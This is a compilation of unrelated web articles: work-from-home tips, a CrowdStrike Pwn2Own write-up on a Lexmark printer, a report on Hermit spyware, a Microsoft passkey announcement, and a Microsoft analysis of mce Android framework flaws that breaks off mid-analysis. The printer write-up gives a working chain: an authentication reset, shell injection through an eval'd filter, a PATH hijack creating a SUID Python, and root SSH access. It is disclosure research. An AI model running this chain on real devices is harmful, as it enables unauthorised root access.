Verily Magazine calls these tasks “small acts of success,” and they can help build your momentum for the heavier projects that are waiting for you later on.

Product designer, Brittany Leaning, says about her routine, “For me, the most productive times of the day are usually early in the morning or late at night. I recognize this and try to plan my day accordingly. Also, music that pumps me up doesn’t hurt.”

The responsibility is on you to know when you are most productive and build your work schedule around the periods of maximum productivity.

9. Save calls for the afternoon.

Sometimes, I’m so tired in the morning, that I don’t even want to hear my voice — let alone talk to others with it.

You shouldn’t have to give yourself too much time to become productive in the morning, but you can give yourself some extra time before working directly with others.

If you’re struggling to develop a reasonable work schedule for yourself as a telecommuter, start with the solitary tasks in the morning.

Save your phone calls, meetings, Google hangouts meetings, video call, and other collaborative work for when you’ve officially “woken up.”

Senior Marketing Director, James Gilbert, advises that you “Take advantage of morning hours to crank through meaty projects without distractions, and save any calls or virtual meetings for the afternoon.”

10. Focus on one distraction.

There’s an expression out there that says, “if you want something done, ask a busy person.”

The bizarre but true rule of productivity is that the busier you are, the more you’ll do.

It’s like Newton’s law of inertia: If you’re in motion, you’ll stay in motion. If you’re at rest, you’ll stay at rest. And busy people are in fast-enough motion that they have the momentum to complete anything that comes across their desk.

Unfortunately, it’s hard to find things to help you reach that level of busyness when you’re at home — your motivation can just swing so easily. HubSpot’s principal marketing manager, Pam Vaughan, suggests focusing on something that maintains your rhythm (in her case, it’s her daughter).

She says, “When I work from home, my 20-month-old daughter is home with me, too. It seems counterintuitive, but because I have to manage taking care of her and keeping her happy and entertained while still getting my work done, the pressure helps to keep me focused. When she’s napping or entertaining herself, I go into super-productive work mode.

The ‘distraction’ of my daughter (I mean that in the most loving way possible) means I can’t possibly succumb to some of the other common distractions of home.”

11. Plan out what you’ll be working on ahead of time.

Spending time figuring out what you’ll do today can take away from actually doing those things. And, you’ll have planned your task list so recently that you can be tempted to change your schedule on the fly.

It’s important to let your agenda change if you need it to, but it’s equally important to commit to a schedule that outlines every assignment before you begin.

Try solidifying your schedule the day before, making it feel more official when you wake up the next day to get started on it.

“Plan out your week in advance to optimize for the environments you’ll be in.”- Niti Shah

12. Use technology to stay connected.

Working from home might make you feel cut off from the larger operation happening in your company.

Instant messaging and videoconferencing tools like Slack and Zoom can make it easy to check in with other remote employees and remind you how your work contributes to the big picture.

It’s also vital to invest in the right technology. For instance, a bad-performance router can take the steam right off your enthusiasm to work, so it’s better to invest in a high-performance router.

CMO and former HubSpot employee, Meghan Keaney Anderson, remarks, “At HubSpot, we use Slack to keep conversations going remotely, Trello to keep us organized around priorities, and Google Hangouts plus Webex to make remote meetings more productive. Getting the right stack of support tools to fit your work style makes a big difference.”

13. Match your music to the task at hand.

During the week, music is the soundtrack to your career (cheesy, but admit it, it’s true). And at work, the best playlists are diverse playlists — you can listen to music that matches the energy of the project you’re working on to boost your productivity.

Video game soundtracks are excellent at doing this. In the video game, the lyric-free music is designed to help you focus; it only makes sense that it would help you focus on your work.

Want some other genres to spice up your routine and make you feel focused? Take them from startup marketer, Ginny Mineo, who offers her work music preferences below.

“When I’m powering through my inbox, I need some intense and catchy rap/R&B (like Nicki Minaj or Miley Cyrus) blasting through my headphones, but when I’m writing, Tom Petty is the trick. Finding what music motivates and focuses me for different tasks (and then sticking to those playlists for those tasks) has completely changed my WFH productivity.”

14. Use laundry as a work timer.

You might have heard that listening to just two or three songs in the shower can help you save water. And it’s true; hearing a few of your favorite songs start and end, one after another, can remind you how long you’ve been in the bathroom and shorten your wash time.

Why bring this up? Because the same general principle can help you stay on task when working from home. But instead of three songs off your music playlist, run your laundry instead.

Doing your laundry is a built-in timer for your home. So, use the time to start and finish something from your to-do list before changing the load.

Committing to one assignment during the wash cycle and another during the dry process can train you to work smarter on tasks that you might technically have all day to tinker with. And when you know there’s a timer, it makes it hard for distractions to derail your work.

People ops manager, Emma Brudner, notes, “I also usually do laundry when I work from home, and I set mini-deadlines for myself corresponding to when I have to go downstairs to switch loads. If I’m working on an article, I tell myself I’ll get to a certain point before the wash cycle ends. Then I set another goal for the dryer.”

Staying Productive While Working From Home

While you might miss the officeworking full time from home can be good for you.

For one, you don’t have to worry about commuting every day and you can better care for your loved ones by being around more often.

The work from home tips that we have provided can help you make the most of your new routine. Try out a few and you might find that you’re just as productive working from home as you are in the office.

Take me to Projects

Source :
https://blog.hubspot.com/marketing/productivity-tips-working-from-home

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

ProductLexmark MC3224
Affected Firmware Versions
(without claim for completeness)		CXLBL.075.272 (2021-07-29)
CXLBL.075.281 (2021-10-14)
Fixed Firmware VersionCXLBL.076.294 (CVE-2021-44735) Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert
CVECVE-2021-44735 (Shell Command Injection)
CVE-2021-44736 (Authentication Reset)
Root CausesAuthentication Bypass, Shell Command Injection, Insecure SUID Binary
ImpactUnauthenticated Remote Code Execution (RCE) as root
ResearchersHanno Heinrichs, Lukas Kupczyk
Lexmark Resourceshttps[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf
https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a vast amount of actions through the web interface. One of these is Sanitize all information on nonvolatile memory. It can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interfacedestpath and filter are extracted and populated from that data by using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
    perror("setuid");
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"
}

sd_journal_print "Start! params: '$@'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-setlogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect_selogs_wrapper SUID again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.

Exploit

An exploit combining the three vulnerabilities to gain unauthenticated code execution as root  has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., setup wizard has been completed) or it is password-less (i.e., authentication reset already executed earlier or setup wizard not yet completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM',        
    'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', 'root@10.64.23.20')
root@ET788C773C9E20:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.

Additional Resources

Google Says ISPs Helped Attackers Infect Targeted Smartphones with Hermit Spyware

A week after it emerged that a sophisticated mobile spyware dubbed Hermit was used by the government of Kazakhstan within its borders, Google said it has notified Android users of infected devices.

Additionally, necessary changes have been implemented in Google Play Protect — Android’s built-in malware defense service — to protect all users, Benoit Sevens and Clement Lecigne of Google Threat Analysis Group (TAG) said in a Thursday report.

Hermit, the work of an Italian vendor named RCS Lab, was documented by Lookout last week, calling out its modular feature-set and its abilities to harvest sensitive information such as call logs, contacts, photos, precise location, and SMS messages.

Once the threat has thoroughly insinuated itself into a device, it’s also equipped to record audio and make and redirect phone calls, in addition to abusing its permissions to accessibility services to keep tabs on the foreground apps used by the victims.

Its modularity also enables it to be wholly customizable, equipping the spyware’s functionality to be extended or altered at will. It’s not immediately clear who were targeted in the campaign, or which of RCS Lab clients were involved.

The Milan-based company, operating since 1993, claims to provide “law enforcement agencies worldwide with cutting-edge technological solutions and technical support in the field of lawful interception for more than twenty years.” More than 10,000 intercepted targets are purported to be handled daily in Europe alone.

“Hermit is yet another example of a digital weapon being used to target civilians and their mobile devices, and the data collected by the malicious parties involved will surely be invaluable,” Richard Melick, director of threat reporting for Zimperium, said.

The targets have their phones infected with the spy tool via drive-by downloads as initial infection vectors, which, in turn, entails sending a unique link in an SMS message that, upon clicking, activates the attack chain.

It’s suspected that the actors worked in collaboration with the targets’ internet service providers (ISPs) to disable their mobile data connectivity, followed by sending an SMS that urged the recipients to install an application to restore mobile data access.

“We believe this is the reason why most of the applications masqueraded as mobile carrier applications,” the researchers said. “When ISP involvement is not possible, applications are masqueraded as messaging applications.”

To compromise iOS users, the adversary is said to have relied on provisioning profiles that allow fake carrier-branded apps to be sideloaded onto the devices without the need for them to be available on the App Store.

Google

An analysis of the iOS version of the app shows that it leverages as many as six exploits — CVE-2018-4344CVE-2019-8605CVE-2020-3837CVE-2020-9907CVE-2021-30883, and CVE-2021-30983 — to exfiltrate files of interest, such as WhatsApp databases, from the device.

“As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too,” Google Project Zero’s Ian Beer said in a deep-dive analysis of an iOS artifact that impersonated the My Vodafone carrier app.

On Android, the drive-by attacks require that victims enable a setting to install third-party applications from unknown sources, doing so which results in the rogue app, masquerading as smartphone brands like Samsung, requests for extensive permissions to achieve its malicious goals.

The Android variant, besides attempting to root the device for entrenched access, is also wired differently in that instead of bundling exploits in the APK file, it contains functionality that permits it to fetch and execute arbitrary remote components that can communicate with the main app.

“This campaign is a good reminder that attackers do not always use exploits to achieve the permissions they need,” the researchers noted. “Basic infection vectors and drive by downloads still work and can be very efficient with the help from local ISPs.”

Stating that seven of the nine zero-day exploits it discovered in 2021 were developed by commercial providers and sold to and used by government-backed actors, the tech behemoth said it’s tracking more than 30 vendors with varying levels of sophistication who are known to trade exploits and surveillance capabilities.

What’s more, Google TAG raised concerns that vendors like RCS Lab are “stockpiling zero-day vulnerabilities in secret” and cautioned that this poses severe risks considering a number of spyware vendors have been compromised over the past ten years, “raising the specter that their stockpiles can be released publicly without warning.”

“Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments with the technical expertise to develop and operationalize exploits,” TAG said.

“While use of surveillance technologies may be legal under national or international laws, they are often found to be used by governments for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers and opposition party politicians.”

Source :
https://thehackernews.com/2022/06/google-says-isps-helped-attackers.html

Expansion of FIDO standard and new updates for Microsoft passwordless solutions

Howdy folks, 

Happy World Password Day! Today, I’m super excited to share some great news with you: Together, with the FIDO Alliance and other major platforms, Microsoft has announced support for the expansion of a common passwordless standard created by the FIDO Alliance and the World Wide Web consortium. These multi-device FIDO credentials, sometimes referred to as passkeys, represent a monumental step toward a world without passwords. We also have some great updates coming to our passwordless solutions in Azure Active Directory (Azure AD) and Windows that will expand passwordless to more use cases. 

Passwords have never been less adequate for protecting our digital lives. As Vasu Jakkal reported earlier today, there are over 921 password attacks every second. Lots of attackers want your password and will keep trying to steal it from you. It’s better for everyone if we just cut off their supply. 

Replacing passwords with passkeys 

Passkeys are a safer, faster, easier replacement for your password. With passkeys, you can sign in to any supported website or application by simply verifying your face, fingerprint or using a device PIN. Passkeys are fast, phish-resistant, and will be supported across leading devices and platforms. Your biometric information never leaves the device and passkeys can even be synced across devices on the same platform – so you don’t need to enroll each device and you’re protected in case you upgrade or lose your device. You can use Windows Hello today to sign in to any site that supports passkeys, and in the near future, you’ll be able to sign in to your Microsoft account with a passkey from an Apple or Google device.  

We enthusiastically encourage website owners and app developers to join Microsoft, Apple, Google, and the FIDO Alliance to support passkeys and help realize our vision of a truly passwordless world.  

thumbnail image 1 of blog post titled Expansion of FIDO standard and new updates for Microsoft passwordless solutions

Going passwordless 

We’re proud to have been one of the earliest supporters of the FIDO standards, including FIDO2 certification for Windows Hello. We’re thrilled to evolve the FIDO standards ecosystem to support passkeys and that passwordless authentication continues to gain momentum. 

Since we started introducing passwordless sign-in nearly 5 years ago, the number of people across Microsoft services signing in each month without using their password has reached more than 240 million. And in the last six months, over 330,000 people have taken the next step of removing the password from their Microsoft Account. After all, you’re completely safe from password-based attacks if you don’t have one. 

Today, we’re also announcing new capabilities that will make it easier for enterprises to go completely passwordless: 

Passwordless for Windows 365, Azure Virtual Desktop, and Virtual Desktop Infrastructure 

Now that remote or hybrid work is the new norm, lots more people are using a remote or virtualized desktop to get their work done. And now, we’ve added passwordless support for Windows 365, Azure Virtual Desktop, and Virtual Desktop Infrastructure. This is currently in preview with Windows 11 Insiders, and is on the way for Windows 10 as well.  

Windows Hello for Business Cloud Trust  

Windows Hello for Business Cloud Trust simplifies the deployment experience of Windows Hello for hybrid environments. This new deployment model removes previous requirements for public key infrastructure (PKI) and syncing public keys between Azure AD and on-premises domain controllers. This improvement eliminates delays between users provisioning Windows Hello for Business and being able to authenticate and makes it easier than ever to use Windows Hello for Business for accessing on-premises resources and applications. Cloud Trust is now available in preview for Windows 10 21H2 and Windows 11 21H2. 

Multiple passwordless accounts in Microsoft Authenticator 

When we first introduced passwordless sign-in for Azure AD (work or school accounts), Microsoft Authenticator could only support one passwordless account at a time. Now that limitation has been removed and you can have as many as you want. iOS users will start to see this capability later this month and the feature will be available on Android afterwards.  

thumbnail image 2 captioned Passwordless phone sign in experience in Microsoft Authenticator for Azure AD accounts.Passwordless phone sign in experience in Microsoft Authenticator for Azure AD accounts.

Temporary Access Pass in Azure AD 

Temporary Access Pass in Azure AD, a time-limited passcode, has been a huge hit with enterprises since the public preview, and we’ve been adding more ways to use it as we prepare to release the feature this summer. Lots of customers have told us they want to distribute Temporary Access Passes instead of passwords for setting up new Windows devices. You’ll be able to use a Temporary Access Pass to sign in for the first time, to configure Windows Hello, and to join a device to Azure AD. This update will be available next month. 

thumbnail image 3 captioned End user experience for Temporary Access Pass in Windows 11 onboarding.End user experience for Temporary Access Pass in Windows 11 onboarding.

Customers implementing passwordless today 

We already have several great examples of large Microsoft customers implementing passwordless solutions, including Avanade, who went passwordless with help from Feitian to protect their clients’ data against security breaches. Amedisys, a home healthcare and hospice care provider, went passwordless to keep patient personal information secured. Both organizations are committed to using passwordless authentication not only to strengthen security, but also to make the sign-in experience easier for end users. 

We’d love to hear your feedback, so please leave a comment, check out the documentation, and visit aka.ms/gopasswordless for more information. 

Best regards,  

Alex Simons (Twitter: @Alex_A_Simons

Corporate Vice President of Program Management 

Microsoft Identity Division 

Source :
https://techcommunity.microsoft.com/t5/azure-active-directory-identity/expansion-of-fido-standard-and-new-updates-for-microsoft/ba-p/3290633

Android apps with millions of downloads exposed to high-severity vulnerabilities

Microsoft uncovered high-severity vulnerabilities in a mobile framework owned by mce Systems and used by multiple large mobile service providers in pre-installed Android System apps that potentially exposed users to remote (albeit complex) or local attacks. The vulnerabilities, which affected apps with millions of downloads, have been fixed by all involved parties. Coupled with the extensive system privileges that pre-installed apps have, these vulnerabilities could have been attack vectors for attackers to access system configuration and sensitive information.

As it is with many of pre-installed or default applications that most Android devices come with these days, some of the affected apps cannot be fully uninstalled or disabled without gaining root access to the device. We worked with mce Systems, the developer of the framework, and the affected mobile service providers to solve these issues. We commend the quick and professional resolution from the mce Systems engineering teams, as well as the relevant providers in fixing each of these issues, ensuring that users can continue using such a crucial framework.

Collaboration among security researchers, software vendors, and the security community is important to continuously improve defenses for the larger ecosystem. As the threat and computing landscape continues to evolve, vulnerability discoveries, coordinated response, and other forms of threat intelligence sharing are paramount to protecting customers against present and future threats, regardless of the platform or device they are using.

Uncovering the vulnerabilities

Our research on the framework vulnerabilities began while trying to better understand how a pre-installed System application could affect the overall security of mobile devices. We discovered that the framework, which is used by numerous apps, had a “BROWSABLE” service activity that an attacker could remotely invoke to exploit several vulnerabilities that could allow adversaries to implant a persistent backdoor or take substantial control over the device.

The framework seemed to be designed to offer self-diagnostic mechanisms to identify and resolve issues impacting the Android device, indicating its permissions were inherently broad with access to valuable resources. For example, the framework was authorized to access system resources and perform system-related tasks, like adjusting the device’s audio, camera, power, and storage controls. Moreover, we found that the framework was being used by default system applications to leverage its self-diagnostic capabilities, demonstrating that the affiliated apps also included extensive device privileges that could be exploited via the vulnerable framework.

According to mce Systems, some of these vulnerabilities also affected other apps on both Android and iOS devices. Moreover, the vulnerable framework and affiliated apps were found on devices from large international mobile service providers. mce Systems, which offers “Mobile Device Lifecycle and Automation Technologies,” also permitted providers to customize and brand their respective mobile apps and frameworks. Pre-installed frameworks and mobile apps such as mce Systems’ are beneficial to users and providers in areas like simplifying the device activation process, troubleshooting device issues, and optimizing performance. However, their extensive control over the device to deliver these kinds of services could also make them an attractive target for attackers. 

Our analysis further found that the apps were embedded in the devices’ system image, suggesting that they were default applications installed by phone providers. All of the apps are available on the Google Play Store where they go through Google Play Protect’s automatic safety checks, but these checks previously did not scan for these types of issues. As part of our effort to help ensure broad protection against these issues, we shared our research with Google, and Google Play Protect now identifies these types of vulnerabilities.

We initially discovered the vulnerabilities in September 2021 and shared our findings with mce Systems and affected mobile service providers through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). We worked closely with mce Systems’ security and engineering teams to mitigate these vulnerabilities, which included mce Systems sending an urgent framework update to the impacted providers and releasing fixes for the issues. At the time of publication, there have been no reported signs of these vulnerabilities being exploited in the wild.

The high-severity vulnerabilities, which have a Common Vulnerability Scoring System (CVSS) score of 7.0-8.9, are now identified as CVE-2021-42598CVE-2021-42599CVE-2021-42600, and CVE-2021-42601. We want to thank mce Systems’ engineering teams for collaborating quickly and efficiently in resolving these issues as well as to AT&T for proactively working with Microsoft to ensure customers can safely continue to use the framework.

Several other mobile service providers were found using the vulnerable framework with their respective apps, suggesting that there could be additional providers still undiscovered that may be impacted. The affected providers linked below have made updated app versions available to users before this disclosure, ensuring devices can be protected before these vulnerabilities could be exploited. We encourage these providers’ customers to update to the latest versions of these apps from the Google Play store, which include but are not limited to: com.telus.checkupcom.att.dhcom.fivemobile.myaccountcom.freedom.mlp,uat, and com.ca.bell.contenttransfer.

Additionally, the package com.mce.mceiotraceagent might be installed by several mobile phone repair shops. Mobile users are advised to look for that app name and remove it from their phone, if found.

Analyzing apps that use the mce framework

App manifest and permissions

When analyzing an Android application, the first thing that comes to mind is checking its manifest, maintained under the AndroidManifest.xml file. The manifest describes the application itself and its components, such as the following:

  • Permissions (for example, camera access, internet access, and others)
  • Activities and how they respond to Intents sent to them
  • Content providers
  • Receivers and the kind of content they expect to receive
  • Services

Checking the manifest of an app affiliated with mce Systems’ framework shed light on some of its features and capabilities but did not immediately indicate that any vulnerabilities or security issues were present. Therefore, further research into the app’s functionality was needed by understanding its permissions.

Analysis of the app’s permissions on the mobile device revealed authorizations that could lead to powerful access and capabilities for an attacker. Those permissions included control over the following:

  • Networking: access the internet, modify Wi-Fi state, network state, NFC, and Bluetooth
  • File access: read and write to the external storage
  • Peripherals: access the camera, record audio, get fingerprint information, and get the device’s physical location
  • Private information: read phone numbers, account information, and contacts
  • Management: install apps and modify device settings

With access to these valuable resources, the app could be abused by an attacker to implant a persistent backdoor on the device.

BROWSABLE activities

The “Activities” section of the app’s manifest detailed that the Intent-filter element included activities with a “BROWSABLE” category. While most Intents do not require a category, category strings detail the components that should handle the Intent. In particular, the BROWSABLE category allows the target Activity to be triggered from a web browser to display data referenced by a link, like an image. BROWSABLE activities appeal to attackers as the latter can exploit them via malicious web pages and other Intent-based attacks.

Figure 1:  BROWSABLE Activity with the “mcedigital://” scheme

The Intent-filter element in the manifest dictates how the Activity can be triggered. In the app’s case, the Activity could be triggered by simply clicking a link with the “mcedigital://” scheme. This would start the com.mce.sdk.AppActivity Activity with an Intent with arbitrary data (besides the scheme).

Digging deeper: Reviewing the mce framework’s main functionality

We reviewed the effects of triggering the com.mce.sdk.AppActivity. Also known as appActivity, this Activity refers to the different functionalities provided by the app. AppActivity extends Activity and therefore has an onCreate method, which traditionally handles the creating Intent.

AppActivity

Here’s a brief description of AppActivity:

  1. AppActivity has a member called “webView” and type “JarvisWebView,” a specialized class that extends WebView.
  2. Upon creation, AppActivity has some optional display choices from the Intent (if they exist) and then loads a predefined web page to the WebView. That predefined page can get arbitrary query parameters from the Intent’s data; that is, everything after a “\?” will be added to the web page.

Thus, if a user clicks this:

mcedigital://ignored\?arbitrary_params

The App’s WebView loads the following web page:

file:///android_asset/applications/user/reflow-container-bundled/index.html?arbitrary_params

The app’s index.html web page (which is an asset built into the Android app) loads two JavaScript files:

  • config.js: a nonexistent file
  • bundle.js: contains much of the app’s logic

Since we wanted to understand the interplay between bundle.js (JarvisJSInterface) and the WebView (JarvisWebView), we analyzed both.

JarvisWebView and JarvisJSInterface

The main features of the WebView, JarvisWebView class, are the following:

A JavaScript Interface is a conspicuous target to look for security issues, as it uses a JavaScript Bridge to allow invoking specific methods inside an Android app. In the case of JarvisJSInterface, three methods are exported:

  • init(String): takes a string that will be used as a JavaScript callback method; in our case, it will always be window.AndroidCallback
  • windowClose(): runs a callback registered by the Android app
  • request(String): sends a service request from the JavaScript client to the server (Android app)

The request method is by far the most interesting, as it performs the following:

  1. Interprets the given string as a JSON object
  2. Extracts the following pieces from the JSON object:
    • Context: a random GUID generated by the client, used to link requests and responses
    • Service: the service we are about to call to
    • Command: an integer
    • Data: optional parameters sent to the service call
  3. Invokes the method serviceCall, which finds the registered service, gets the method based on the command number, and eventually invokes that method using Java reflection
Figure 2: Service::callServiceMethod

The serviceCall is a powerful method, as it allows the WebView to invoke “services” freely. But what are these services, exactly?

Services offered by the mce framework

After we examined the services offered by this framework per the app manifest, we then obtained a list of services that practically give the WebView complete control over the device. The most notable services include:

  • Audio: access and manipulate volume levels, as well as play a tone with a given duration and frequency
  • Camera: take a silent snapshot
  • Connectivity: control and obtain valuable information from NFC, Wi-Fi, and Bluetooth
  • Device: includes various device controlling mechanisms like battery drainage, performing a factory reset, and obtaining information on apps, addresses, sensor data, and much more
  • Discovery: set the device to discoverable
  • Location: obtain the location in various modes and set the location state
  • PackageManager: acquire package info and silently install a new app
  • Power: obtain charging state
  • Sensor: acquire sensor data such as barometer data, light data, proximity data, and whether fingerprinting is working
  • Storage: obtain content such as documents, media, images, and videos

These services inherit from a base class named “Service” and implement two methods:

  • setServiceName: for service identification purposes
  • setServiceMethodMap: for setting up the mapping between the command integer and the method name, argument names, and argument types

For example, here is the Camera service setting its methods:

  • Method 0 is “getCameraList” and expects no arguments.
  • Method 1 is “captureStillImageNoPreview” and expects one String argument.
Figure 3: The Camera service setting its methods

Vulnerability findings

Based on our analysis of the mce framework, we discovered several vulnerabilities. It should be noted that while mobile service providers can customize their apps respective to mce framework so as not to be identical, the vulnerabilities we discovered can all be exploited in the same manner—by injecting code into the web view. Nonetheless, as their apps and framework customization use different configurations and versions, not all providers are necessarily vulnerable to all the discovered vulnerabilities.

